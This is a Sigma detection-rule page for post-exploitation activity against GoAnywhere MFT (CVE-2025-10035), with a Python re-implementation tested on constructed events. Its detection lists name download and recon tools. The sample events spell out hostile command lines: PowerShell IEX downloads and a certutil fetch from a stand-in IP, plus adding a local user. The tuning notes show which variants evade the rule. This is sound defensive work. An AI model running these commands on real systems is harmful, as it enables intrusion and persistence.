Potential Exploitation of GoAnywhere MFT Vulnerability
Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application. The rule keys on the Tomcat service under the GoAnywhere install path as the parent process, so a PowerShell, cmd.exe or LOLBin (certutil, bitsadmin, mshta, cscript, wscript) child running reconnaissance, download or encoded commands is treated as post-exploitation activity, such as the exploitation of CVE-2025-10035 by the threat actor Storm-1175 described in Microsoft's report.
Sigma rule
title: Potential Exploitation of GoAnywhere MFT Vulnerability
id: 6c76b3d0-afe4-4870-9443-ffe6773c5fef
status: experimental
description: |
  Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.
  This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
references:
  - https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/
author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-07
tags:
  - attack.initial-access
  - attack.t1190
  - attack.execution
  - attack.t1059.001
  - attack.persistence
  - attack.t1133
  - detection.emerging-threats
  - cve.2025-10035
logsource:
  category: process_creation
  product: windows
detection:
  # Identifies the GoAnywhere Tomcat parent process by its image path
  selection_parent:
    ParentImage|contains: '\GoAnywhere\tomcat\'
  selection_powershell_img:
    Image|endswith:
      - '\powershell.exe'
      - '\powershell_ise.exe'
      - '\pwsh.exe'
  # The three list items below are OR-ed; inside the first, |all requires every string
  selection_powershell_cmd:
    - CommandLine|contains|all:
        - 'IEX'
        - 'enc'
        - 'Hidden'
        - 'bypass'
    - CommandLine|re:
        - 'net\s+user'
        - 'net\s+group'
        - 'query\s+session'
    - CommandLine|contains:
        - 'whoami'
        - 'systeminfo'
        - 'dsquery'
        - 'localgroup administrators'
        - 'nltest'
        - 'samaccountname='
        - 'adscredentials'
        - 'o365accountconfiguration'
        - '.DownloadString('
        - '.DownloadFile('
        - 'FromBase64String('
        - 'System.IO.Compression'
        - 'System.IO.MemoryStream'
        - 'curl'
  selection_child_cmd:
    Image|endswith: '\cmd.exe'
    CommandLine|contains:
      - 'powershell'
      - 'whoami'
      - 'net.exe'
      - 'net1.exe'
      - 'rundll32'
      - 'quser'
      - 'nltest'
      - 'curl'
  # No Image constraint here: any child of the Tomcat parent whose command line names one of these LOLBins
  selection_child_others:
    CommandLine|contains:
      - 'bitsadmin'
      - 'certutil'
      - 'mshta'
      - 'cscript'
      - 'wscript'
  condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)
falsepositives:
  - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.
level: high
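To see exactly which events the condition above fires on, the following is an added example that re-implements the rule's selections and condition in plain Python and runs them over a handful of constructed Sysmon-style process_creation events. It is not code from the Sigma project or from the rule's authors; the install path, command lines, IP address and base64 blob are invented sample data. It follows the Sigma matching semantics: `contains` and `endswith` are case-insensitive, while `re` is case-sensitive unless the rule adds the `i` flag.

```python
"""Added example: the GoAnywhere MFT rule's detection logic as plain Python,
run over constructed process_creation events. Not the Sigma project's code."""
import re

POWERSHELL_IMAGES = ("\\powershell.exe", "\\powershell_ise.exe", "\\pwsh.exe")
POWERSHELL_ALL_OF = ("IEX", "enc", "Hidden", "bypass")
POWERSHELL_REGEX = (r"net\s+user", r"net\s+group", r"query\s+session")
POWERSHELL_ANY_OF = (
    "whoami", "systeminfo", "dsquery", "localgroup administrators", "nltest",
    "samaccountname=", "adscredentials", "o365accountconfiguration",
    ".DownloadString(", ".DownloadFile(", "FromBase64String(",
    "System.IO.Compression", "System.IO.MemoryStream", "curl",
)
CMD_CHILD_ANY_OF = ("powershell", "whoami", "net.exe", "net1.exe", "rundll32",
                    "quser", "nltest", "curl")
OTHER_CHILD_ANY_OF = ("bitsadmin", "certutil", "mshta", "cscript", "wscript")


def contains(value, needle):
    # Sigma string modifiers (contains/endswith) match case-insensitively.
    return needle.lower() in value.lower()


def endswith(value, suffix):
    return value.lower().endswith(suffix.lower())


def selection_parent(ev):
    return contains(ev.get("ParentImage", ""), "\\GoAnywhere\\tomcat\\")


def selection_powershell_img(ev):
    return any(endswith(ev.get("Image", ""), s) for s in POWERSHELL_IMAGES)


def selection_powershell_cmd(ev):
    cl = ev.get("CommandLine", "")
    # The three list items are OR-ed; the first needs every string (|all).
    return (all(contains(cl, s) for s in POWERSHELL_ALL_OF)
            # Sigma |re is case-sensitive unless the rule uses |re|i; mirror that.
            or any(re.search(p, cl) for p in POWERSHELL_REGEX)
            or any(contains(cl, s) for s in POWERSHELL_ANY_OF))


def selection_child_cmd(ev):
    return (endswith(ev.get("Image", ""), "\\cmd.exe")
            and any(contains(ev.get("CommandLine", ""), s) for s in CMD_CHILD_ANY_OF))


def selection_child_others(ev):
    # No Image constraint in the rule, only the command line.
    return any(contains(ev.get("CommandLine", ""), s) for s in OTHER_CHILD_ANY_OF)


def matches(ev):
    """condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)"""
    return selection_parent(ev) and (
        (selection_powershell_img(ev) and selection_powershell_cmd(ev))
        or selection_child_cmd(ev)
        or selection_child_others(ev))


# Constructed sample events (Sysmon EID 1 field names). Paths, host and blob are invented.
TOMCAT = r"C:\Program Files\HelpSystems\GoAnywhere\tomcat\bin\tomcat9.exe"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PWSH = r"C:\Program Files\PowerShell\7\pwsh.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"id": "ps-iex", "ParentImage": TOMCAT, "Image": PS_EXE,
     "CommandLine": "powershell.exe -w Hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/a.ps1')\""},
    {"id": "ps-enc-only", "ParentImage": TOMCAT, "Image": PS_EXE,
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": "ps-net-user", "ParentImage": TOMCAT, "Image": PWSH,
     "CommandLine": 'pwsh -c "net user helper P@ssw0rd! /add"'},
    {"id": "ps-net-user-upper", "ParentImage": TOMCAT, "Image": PWSH,
     "CommandLine": 'pwsh -c "NET USER helper P@ssw0rd! /add"'},
    {"id": "cmd-whoami", "ParentImage": TOMCAT, "Image": CMD,
     "CommandLine": "cmd.exe /c whoami /all"},
    {"id": "certutil-download", "ParentImage": TOMCAT, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://203.0.113.10/x.exe x.exe"},
    {"id": "benign-parent", "ParentImage": r"C:\Windows\explorer.exe", "Image": CMD,
     "CommandLine": "cmd.exe /c whoami"},
    {"id": "benign-child", "ParentImage": TOMCAT, "Image": r"C:\Program Files\Java\bin\java.exe",
     "CommandLine": "java -version"},
]


def run_detection(events):
    """Return the ids of the events the rule would alert on, in input order."""
    return [ev["id"] for ev in events if matches(ev)]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['id']:<20} {'ALERT' if matches(ev) else 'ok'}")
```

The two negatives worth noticing when tuning are `ps-enc-only` and `ps-net-user-upper`: a bare `-enc` payload with no readable `IEX`, download or recon string on the command line is not caught by `selection_powershell_cmd` (the `|all` item needs the literal `IEX` as well), so pair this rule with a generic encoded-PowerShell rule; and the `net user` / `net group` / `query session` regexes are case-sensitive as written, so `NET USER` slips through unless the rule is changed to `|re|i`.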
References
- https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/
Related rules
- Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
- Suspicious CrushFTP Child Process
- Exploited CVE-2020-10189 Zoho ManageEngine
- Potential SAP NetWeaver Webshell Creation
- Potential SAP NetWeaver Webshell Creation - Linux